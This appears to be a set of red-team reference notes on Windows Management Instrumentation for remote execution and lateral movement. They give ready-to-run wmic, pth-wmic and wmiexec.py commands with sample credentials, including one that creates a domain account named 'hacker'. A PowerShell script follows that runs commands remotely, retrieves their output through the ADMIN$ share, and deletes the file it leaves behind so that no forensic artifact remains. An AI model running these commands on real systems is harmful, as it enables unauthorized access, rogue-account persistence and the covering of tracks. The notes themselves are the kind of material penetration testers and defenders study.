Backlink: reference-notes-readme
WMI is Microsoft's consolidation of system management under a single umbrella. It is used heavily under the hood for local administration, but it also supports remote WQL queries and remote code execution (Win32_Process.Create). Several built-in tools exist for either, and Impacket's wmiexec.py builds a semi-interactive shell on top of it. Remote WMI uses RPC/DCOM as the communication bus.
Port: 135/TCP (RPC endpoint mapper), plus one dynamic high TCP port negotiated for DCOM (49152-65535 by default on Vista/2008 and later). wmiexec.py additionally needs SMB (445/TCP) because it relays command output through a file on ADMIN$.
Tools: wmic.exe, Get-WmiObject / Get-CimInstance / Invoke-WmiMethod (PowerShell), pth-wmic (Linux), wmiexec.py (Impacket)
Examples
List Services:
wmic.exe /USER:"testlab\josh" /PASSWORD:"Password1" /NODE:192.168.112.200 service get "startname,pathname"
Execute Code (Add User; /domain creates the account on a DC, omit it for a local account. Note that WMI returns only a ReturnValue and ProcessId, never the command's output):
wmic /USER:"testlab\josh" /PASSWORD:"Password1" /NODE:192.168.112.200 process call create "net user hacker Str0nGP_$sw0rd /add /domain"
List Services (via PS cmdlet; Get-WmiObject uses DCOM with the current logon token, add -Credential for alternate credentials):
Get-WmiObject -ComputerName 192.168.112.200 -Query "SELECT * FROM Win32_Service"
List Processes (via Linux wmic util):
pth-wmic -U testlab/josh%Password1 //192.168.112.200 "select csname,name,processid,sessionid from win32_process"
Semi-interactive Shell (impacket; syntax is [domain/]user[:password]@host, command output comes back over SMB via ADMIN$):
wmiexec.py testlab/josh:Password1@192.168.112.200
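The same two operations as the examples above (WQL query, then Win32_Process.Create) done from PowerShell with explicit credentials and a DCOM CIM session, plus the output-via-file trick that wmiexec.py automates. This is an added example, not part of the original notes; the host, domain, account and C:\Windows\Temp\out.txt path are placeholders matching the notes above.

```powershell
# Added example (not from the original notes): remote WMI over DCOM from PowerShell.
# Target, domain and account are the same placeholder values used in the notes above.
$target = '192.168.112.200'
$cred   = Get-Credential -Credential 'testlab\josh'   # prompts for the password

# New-CimSession defaults to WSMan (5985/TCP); -Protocol Dcom forces WMI's own
# transport, i.e. 135/TCP plus one dynamic high port, exactly like wmic.exe /NODE.
$opt = New-CimSessionOption -Protocol Dcom
$cim = New-CimSession -ComputerName $target -Credential $cred -SessionOption $opt

# WQL query: same data as the "service get startname,pathname" example.
Get-CimInstance -CimSession $cim -Query 'SELECT Name,StartName,PathName FROM Win32_Service' |
    Select-Object Name, StartName, PathName

# Code execution via Win32_Process.Create. WMI hands back only a ReturnValue and a
# ProcessId, never stdout, so redirect output to a file that can be read over SMB.
$cmd = 'cmd.exe /c whoami /all > C:\Windows\Temp\out.txt 2>&1'
$r = Invoke-CimMethod -CimSession $cim -ClassName Win32_Process -MethodName Create `
        -Arguments @{ CommandLine = $cmd }

# Documented Win32_Process.Create return codes: 0 success, 2 access denied,
# 3 insufficient privilege, 8 unknown failure, 9 path not found, 21 invalid parameter.
if ($r.ReturnValue -ne 0) { throw "Create failed on $target with ReturnValue $($r.ReturnValue)" }
"Started PID $($r.ProcessId) on $target"

# Retrieve the output over SMB (445/TCP). ADMIN$ maps to C:\Windows, and mapping it
# as a PSDrive lets us pass the same credential instead of relying on the local logon.
Start-Sleep -Seconds 2
New-PSDrive -Name T -PSProvider FileSystem -Root "\\$target\ADMIN$" -Credential $cred | Out-Null
Get-Content 'T:\Temp\out.txt'
Remove-Item 'T:\Temp\out.txt'          # clean up the artifact we left on disk
Remove-PSDrive -Name T
Remove-CimSession $cim
```

Two things to keep in mind when running this: the spawned process runs as the supplied account under WmiPrvSE.exe in session 0, so anything interactive will hang, and the redirected file is a forensic artifact on the target (the same is true of wmiexec.py's temporary file on ADMIN$), which is why the example removes it.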